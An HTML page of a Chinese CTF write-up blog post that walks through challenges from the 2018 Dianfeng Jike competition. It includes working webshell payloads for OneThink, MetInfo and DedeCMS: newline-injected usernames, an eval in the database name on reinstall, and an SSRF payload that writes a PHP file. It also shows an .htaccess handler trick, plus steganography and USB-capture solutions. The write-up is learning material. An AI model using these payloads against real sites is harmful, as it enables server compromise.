<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="en">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />




  
  
  
  

  
    
    
  

  

  

  

  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Lato:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.1" rel="stylesheet" type="text/css" />


  <meta name="keywords" content="Hexo, NexT" />








  <link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=5.1.1" />






<meta name="description" content="大师傅们下手太重了orz">
<meta name="keywords">
<meta property="og:type" content="article">
<meta property="og:title" content="巅峰极客wp">
<meta property="og:url" content="http://Merl1ng.com/2018/07/23/巅峰极客wp/index.html">
<meta property="og:site_name" content="Merl1ng's blog">
<meta property="og:description" content="大师傅们下手太重了orz">
<meta property="og:image" content="http://otvzfr1o1.bkt.clouddn.com/73733.PNG">
<meta property="og:image" content="http://otvzfr1o1.bkt.clouddn.com/993.PNG">
<meta property="og:image" content="http://otvzfr1o1.bkt.clouddn.com/76786786.PNG">
<meta property="og:image" content="http://otvzfr1o1.bkt.clouddn.com/77667863.PNG">
<meta property="og:image" content="http://otvzfr1o1.bkt.clouddn.com/7886786.PNG">
<meta property="og:image" content="http://otvzfr1o1.bkt.clouddn.com/87678678.PNG">
<meta property="og:image" content="http://otvzfr1o1.bkt.clouddn.com/876786.PNG">
<meta property="og:image" content="http://otvzfr1o1.bkt.clouddn.com/faqafwq.PNG">
<meta property="og:image" content="http://otvzfr1o1.bkt.clouddn.com/dadaw.PNG">
<meta property="og:image" content="http://otvzfr1o1.bkt.clouddn.com/9699.PNG">
<meta property="og:image" content="http://otvzfr1o1.bkt.clouddn.com/6666.PNG">
<meta property="og:image" content="http://otvzfr1o1.bkt.clouddn.com/3353.PNG">
<meta property="og:image" content="http://otvzfr1o1.bkt.clouddn.com/9696.PNG">
<meta property="og:image" content="http://otvzfr1o1.bkt.clouddn.com/7373.PNG">
<meta property="og:image" content="http://otvzfr1o1.bkt.clouddn.com/7886786k.PNG">
<meta property="og:image" content="http://otvzfr1o1.bkt.clouddn.com/fdfxxoorr.PNG">
<meta property="og:image" content="http://otvzfr1o1.bkt.clouddn.com/gwrgrwgwr.PNG">
<meta property="og:updated_time" content="2018-08-21T07:04:10.533Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="巅峰极客wp">
<meta name="twitter:description" content="大师傅们下手太重了orz">
<meta name="twitter:image" content="http://otvzfr1o1.bkt.clouddn.com/73733.PNG">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    sidebar: {"position":"left","display":"always","offset":12,"offset_float":0,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    motion: true,
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://Merl1ng.com/2018/07/23/巅峰极客wp/"/>





  <title>巅峰极客wp | Merl1ng's blog</title>
  














</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="en">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail ">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Merl1ng's blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            Categories
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            Archives
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            Tags
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal " itemscope itemtype="http://schema.org/Article">
    <link itemprop="mainEntityOfPage" href="http://Merl1ng.com/2018/07/23/巅峰极客wp/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Merl1ng">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Merl1ng's blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">巅峰极客wp</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2018-07-23T18:53:58+08:00">
                2018-07-23
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>大师傅们下手太重了orz</p>
<a id="more"></a> 
<p>考点基本都是cms实战 还有1day </p>
<h3 id="a-simple-cms"><a href="#a-simple-cms" class="headerlink" title="a simple cms"></a>a simple cms</h3><p>onethink 用的是thinkphp3.2</p>
<p>疯狂查洞 注入的试了试不行 然后查到一个注册用户名写shell的 还真是这个</p>
<p>但它这个缓存文件名改了 扫目录可得 www.zip </p>
<p>需要本地搭一个找到文件名</p>
<p>下载文件，在本地构建复现环境，首先删除onethink/onethink/Application/Install/Data/install.lock文件，然后访问install.php</p>
<p>依次使用</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">%0a<span class="variable">$a</span>=<span class="variable">$_GET</span>[a];//</div><div class="line"> </div><div class="line">%0aecho `<span class="variable">$a</span>`;//</div></pre></td></tr></table></figure>
<p>这里我有一句mmp ``在别的wp里被转了 导致一直没复现成功。。。。。</p>
<p><strong>这里一定要用burp抓包注册和登陆 否则%0a会被当做字符串写到你用户名里 </strong></p>
<p>注册账号，在依次登录账号，发现存在Runtime/Temp/onethink_d403acece4ebce56a3a4237340fbbe70.php文件，且文件内容如下：</p>
<p>&lt;?php<br>//000000000000a:4:{s:2:”u1”;s:13:”Administrator”;s:2:”u3”;s:6:”test12”;s:2:”u4”;s:15:”<br>$a=$_GET[a];//“;s:2:”u5”;s:13:”<br>echo <code>$a</code>;//“;}<br>?&gt;</p>
<p>说明我们的一句话上传成功，文件名为Runtime/Temp/onethink_d403acece4ebce56a3a4237340fbbe70.php，该文件名不改变。</p>
<p>在服务器上重复步骤</p>
<p>flag在tmp下 基本上不在tmp就在根目录</p>
<p><img src="http://otvzfr1o1.bkt.clouddn.com/73733.PNG" alt=""></p>
<p><img src="http://otvzfr1o1.bkt.clouddn.com/993.PNG" alt=""></p>
<p><img src="http://otvzfr1o1.bkt.clouddn.com/76786786.PNG" alt=""></p>
<h3 id="mysql-online"><a href="#mysql-online" class="headerlink" title="mysql online"></a>mysql online</h3><p>sql+xss+csrf 看wp都贼费事 但这个应该思路较为常规一点 最后有5个队解出来(这次算多的了orz)</p>
<p>我看一个dalao写wp直接看页面就猜出来是这三个组合 伏地膜。。。</p>
<p>思路看了好久大概明白了</p>
<p>csrf让后台访问 便可以xss到后台 但xss要借助mysql完成</p>
<p>直接访问会报</p>
<p><img src="http://otvzfr1o1.bkt.clouddn.com/77667863.PNG" alt=""></p>
<h3 id="pentest"><a href="#pentest" class="headerlink" title="pentest"></a>pentest</h3><p>metinfo的cms</p>
<p>说是扫目录出 file/file.php</p>
<p>但我扫了下就出一层 file</p>
<p>所以涨个经验 以后把有目录的加上去再扫一遍</p>
<p>然后说应该想到任意文件删除 为啥不想到包含 有师傅说这是个1day 查了下老早以前有个csrf导致的文件删除重装<br>但感觉不是这个<br><a href="https://blog.csdn.net/u011066706/article/details/51176286" target="_blank" rel="external">https://blog.csdn.net/u011066706/article/details/51176286</a></p>
<p>能想到这里的话再往后如果你有实战经验的话可以想到删掉 install.lock 然后重装写shell到数据库名里</p>
<p>然而我丝毫没有 install.lock删掉 和 访问install能重装我看了simple cms的wp才刚知道</p>
<p>这里你访问一下/install目录 会提示你 install.lock的位置 </p>
<p><img src="http://otvzfr1o1.bkt.clouddn.com/7886786.PNG" alt=""></p>
<p>可以看到过滤 ./</p>
<p>不过我其实install都没找到</p>
<p>因为之前onethink是直接install.php的 这个是/install目录</p>
<p>不过扫了一下倒是可以扫出来 这个应该也需要经验猜 我查了meninfo安装好像默认的不是这个</p>
<p>还有删除的时候 是…//</p>
<p>我试了 ../../ ../../../之类的不行 这个三点的目录之前没见过。。。也没查到orz</p>
<p>又问了下师傅  这应该是有过滤 但读不到源码 最后还是只能靠脑洞 getshell以后才能读到源码</p>
<p><img src="http://otvzfr1o1.bkt.clouddn.com/87678678.PNG" alt=""></p>
<p>然后重安装 重装的时候数据库名填写:</p>
<p><code>met#*/@eval($_GET[1]);/*</code></p>
<p><img src="http://otvzfr1o1.bkt.clouddn.com/876786.PNG" alt=""></p>
<p>然后包含默认的数据库配置文件 拿shell</p>
<p>这个你写库名实际会报错的 但不用管直接包含</p>
<p>配置文件默认地址应该很好查到的 或者你填admin正规的数据库名 安装成功也会提示你</p>
<p><img src="http://otvzfr1o1.bkt.clouddn.com/faqafwq.PNG" alt=""></p>
<p><img src="http://otvzfr1o1.bkt.clouddn.com/dadaw.PNG" alt=""></p>
<p><img src="http://otvzfr1o1.bkt.clouddn.com/9699.PNG" alt=""></p>
<p>这个删除 想到重安 shell写配置文件里的应该是一个常规实战的思路 学习了 </p>
<p>这题就一队做出来 没大量实战经验真的难想到 而且卡人的点我觉得很多</p>
<h3 id="dedefun"><a href="#dedefun" class="headerlink" title="dedefun"></a>dedefun</h3><p>通过题目很容易看出要ssrf</p>
<p><a href="https://www.cnblogs.com/s0ky1xd/p/5859049.html" target="_blank" rel="external">https://www.cnblogs.com/s0ky1xd/p/5859049.html</a><br>SSRF漏洞就是通过篡改获取资源的请求发送给服务器，但是服务器并没有发现在这个请求是合法的，然后服务器以他的身份来访问其他服务器的资源。</p>
<p>因为是dedecms 联想到之前的找后台操作中的getimagesize函数</p>
<p>uploadsafe.inc.php文件中使用了getimagesize函数来判断图片，可造成一个ssrf漏洞</p>
<p><a href="https://xz.aliyun.com/t/2064" target="_blank" rel="external">https://xz.aliyun.com/t/2064</a><br><a href="https://paper.tuisec.win/detail/d1053143f127862" target="_blank" rel="external">https://paper.tuisec.win/detail/d1053143f127862</a></p>
<p>核心文件common.inc.php 大概148行左右</p>
<p>if($_FILES)<br>{<br>    require_once(DEDEINC.’/uploadsafe.inc.php’);<br>}</p>
<p>所以只要找到包含\include\common.inc.php的文件就可以利用了，这里利用的是根目录下的tags.php</p>
<p>在 tags.php下 结合题目把之前的payload改一改</p>
<p>dopost=save&amp;_FILES[lsa][tmp_name]=./dee&lt;/images/admin_top_logo.gif&amp;_FILES[lsa][name]=0&amp;_FILES[lsa][size]=0&amp;_FILES[lsa][type]=image/gif</p>
<p>改成</p>
<p>dopost=save&amp;_FILES[lsa][tmp_name]=<a href="http://127.0.0.1/1.php?a=assert%26b=file_put_contents($_GET[1],base64_decode($_GET[2]));%261=./uploads/soft/aaaa.php%262=PD9waHAgcGhwaW5mbygpOyA/Pg==&amp;_FILES[lsa][name]=0&amp;_FILES[lsa][size]=0&amp;_FILES[lsa][type]=image/gif" target="_blank" rel="external">http://127.0.0.1/1.php?a=assert%26b=file_put_contents($_GET[1],base64_decode($_GET[2]));%261=./uploads/soft/aaaa.php%262=PD9waHAgcGhwaW5mbygpOyA/Pg==&amp;_FILES[lsa][name]=0&amp;_FILES[lsa][size]=0&amp;_FILES[lsa][type]=image/gif</a></p>
<p>是先考虑找ssrf可以利用的的点 联想到之前的同一个cms的关注率很高的洞 然后对应改paoload</p>
<p>这样看思路还算清晰 实际你做的时候难得一比 这玩意大概是个1day 当时只有两个队做出来 </p>
<p>不关注近期cms洞和有实战经验的难上难</p>
<h3 id="babyweb"><a href="#babyweb" class="headerlink" title="babyweb"></a>babyweb</h3><p>根据提示先要信息收集</p>
<p>利用软件远程连接数据库</p>
<p><img src="http://otvzfr1o1.bkt.clouddn.com/6666.PNG" alt=""></p>
<p>type直接可以改的 比如把abc改成xxx</p>
<p><img src="http://otvzfr1o1.bkt.clouddn.com/3353.PNG" alt=""></p>
<p>传张图试试 结合数据库中的文件名 在 /img下可以发现上传的图片</p>
<p><img src="http://otvzfr1o1.bkt.clouddn.com/9696.PNG" alt=""></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">&lt;FilesMatch <span class="string">".xxx"</span>&gt;</div><div class="line">SetHandler application/x-httpd-php</div><div class="line">&lt;/FilesMatch&gt;</div></pre></td></tr></table></figure>
<p>.ht 那个是控制解析的  命名还有个坑要另存为 但还得自己修改另一个后缀才能允许比如xxx的文件上传</p>
<p>最后拿到shell </p>
<p><img src="http://otvzfr1o1.bkt.clouddn.com/7373.PNG" alt=""></p>
<p><img src="http://otvzfr1o1.bkt.clouddn.com/7886786k.PNG" alt=""></p>
<p>也就一个队做出来 </p>
<h3 id="misc-1"><a href="#misc-1" class="headerlink" title="misc 1"></a>misc 1</h3><p>使用Stegsolve打开图片，分别提取红、绿、蓝三个通道的最低位</p>
<p>发现是Ook!和brainfuck，使用在线解密：<br><a href="https://www.splitbrain.org/services/ook" target="_blank" rel="external">https://www.splitbrain.org/services/ook</a></p>
<h3 id="misc-2"><a href="#misc-2" class="headerlink" title="misc 2"></a>misc 2</h3><p>题目提示 0xff</p>
<p>想到使用0xFF异或整个文件</p>
<p>winhex可以直接异或</p>
<p><img src="http://otvzfr1o1.bkt.clouddn.com/fdfxxoorr.PNG" alt=""></p>
<p>得到新的png文件</p>
<p>使用二进制编辑器观察尾部，看到提示“black and white”，以及“IEND”标识，这是png的文件尾部，暗示该文件中隐藏了一个png文件。</p>
<p>直接手扣一个png</p>
<p>观察png文件，可以看到色块分为11列，每列隔行的色块永远是黑色，这说明应该横向读取图片，而列中的横长条由8个小色块组成，显然其代表的是一个字节的数据</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div></pre></td><td class="code"><pre><div class="line">from PIL import Image </div><div class="line">im = Image.open(<span class="string">"2.PNG"</span>) </div><div class="line">width = im.slize[0] </div><div class="line">height = im.size[1] </div><div class="line"><span class="built_in">print</span>(<span class="string">"width:%d"</span>%(width)) </div><div class="line"><span class="built_in">print</span>(<span class="string">"height:%d"</span>%(height)) </div><div class="line">count = 0 </div><div class="line">ans = <span class="string">""</span> </div><div class="line"><span class="keyword">for</span> h <span class="keyword">in</span> range(0, height): </div><div class="line">	<span class="keyword">for</span> w <span class="keyword">in</span> range(0, width-1): </div><div class="line">		pixel = im.getpixel((w, h)) color = (pixel[0]*256*256+pixel[1]*256+pixel[2])//Oxffffff </div><div class="line">		<span class="keyword">if</span> color == 1: </div><div class="line">			color = 0 </div><div class="line">		<span class="keyword">else</span>: </div><div class="line">			color = 1 </div><div class="line">		<span class="built_in">print</span>(<span class="string">"%x"</span>%(color), end=<span class="string">","</span>) </div><div class="line">		count += i </div><div class="line">		ans += str(color) </div><div class="line">		<span class="keyword">if</span> count == 9: </div><div class="line">			<span class="built_in">print</span>(<span class="string">"%c"</span>%int(ans,2)) </div><div class="line">			<span class="keyword">if</span> ans != <span class="string">"011111111"</span>: </div><div class="line">				<span class="built_in">print</span>(<span class="string">"%c"</span>%int(ans,2)) </div><div class="line">			count = 0 </div><div class="line">			ans = <span class="string">""</span></div></pre></td></tr></table></figure>
<h3 id="misc-3"><a href="#misc-3" class="headerlink" title="misc 3"></a>misc 3</h3><p>usb协议分析 </p>
<p><a href="https://www.anquanke.com/post/id/85218" target="_blank" rel="external">https://www.anquanke.com/post/id/85218</a></p>
<p>按length排下序</p>
<p>依次点击 显示分组字节 原始数据 保存</p>
<p><img src="http://otvzfr1o1.bkt.clouddn.com/gwrgrwgwr.PNG" alt=""></p>
<p>95那个里面有 tips   out的总共也就十几个 可以全存下载遍历</p>
<p>将两个最大的数据导出为1.pcap和2.pcap</p>
<p>在kali里 <strong>tshark命令</strong></p>
<pre><code>tshark -r 1.pcap -T fields -e usb.capdata &gt; 1.txt
tshark -r 2.pcap -T fields -e usb.capdata &gt; 2.txt
</code></pre><p>然后参考 <a href="http://www.lovei.org/archives/2018cdgcrace.html" target="_blank" rel="external">http://www.lovei.org/archives/2018cdgcrace.html</a> 不想写了。。</p>

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        

      
    </div>

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2018/07/29/利用gopher和ssrf操作内网mysql/" rel="next" title="利用gopher和ssrf操作内网mysql">
                <i class="fa fa-chevron-left"></i> 利用gopher和ssrf操作内网mysql
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2018/07/22/安恒七月月赛wp/" rel="prev" title="安恒七月月赛wp">
                安恒七月月赛wp <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          
  <div class="comments" id="comments">
    
  </div>


        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap" >
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            Overview
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
          <img class="site-author-image" itemprop="image"
               src="/images/avatar.gif"
               alt="Merl1ng" />
          <p class="site-author-name" itemprop="name">Merl1ng</p>
           
              <p class="site-description motion-element" itemprop="description">Love life , love gakki !</p>
          
        </div>
        <nav class="site-state motion-element">

          
            <div class="site-state-item site-state-posts">
              <a href="/archives/">
                <span class="site-state-item-count">76</span>
                <span class="site-state-item-name">posts</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-categories">
              <a href="/categories/index.html">
                <span class="site-state-item-count">7</span>
                <span class="site-state-item-name">categories</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-tags">
              <a href="/tags/index.html">
                <span class="site-state-item-count">24</span>
                <span class="site-state-item-name">tags</span>
              </a>
            </div>
          

        </nav>

        

        <div class="links-of-author motion-element">
          
            
              <span class="links-of-author-item">
                <a href="https://github.com/Merl1ng" target="_blank" title="GitHub">
                  
                    <i class="fa fa-fw fa-github"></i>
                  
                  GitHub
                </a>
              </span>
            
              <span class="links-of-author-item">
                <a href="https://twitter.com/Merl1ng" target="_blank" title="Twitter">
                  
                    <i class="fa fa-fw fa-twitter"></i>
                  
                  Twitter
                </a>
              </span>
            
          
        </div>

        
        

        
        

        


      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#a-simple-cms"><span class="nav-number">1.</span> <span class="nav-text">a simple cms</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#mysql-online"><span class="nav-number">2.</span> <span class="nav-text">mysql online</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#pentest"><span class="nav-number">3.</span> <span class="nav-text">pentest</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#dedefun"><span class="nav-number">4.</span> <span class="nav-text">dedefun</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#babyweb"><span class="nav-number">5.</span> <span class="nav-text">babyweb</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#misc-1"><span class="nav-number">6.</span> <span class="nav-text">misc 1</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#misc-2"><span class="nav-number">7.</span> <span class="nav-text">misc 2</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#misc-3"><span class="nav-number">8.</span> <span class="nav-text">misc 3</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright" >
  
  &copy; 
  <span itemprop="copyrightYear">2018</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Merl1ng</span>
</div>


<div class="powered-by">
   Love life 
</div>

<div class="theme-info">
  Love gakki 
  
</div>


        

        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.1"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.1"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.1"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.1"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.1"></script>



  


  




	





  





  






  





  

  

  

  

  

  

</body>
</html>

<!-- 页面点击小红心 -->
<script type="text/javascript" src="/js/src/love.js"></script>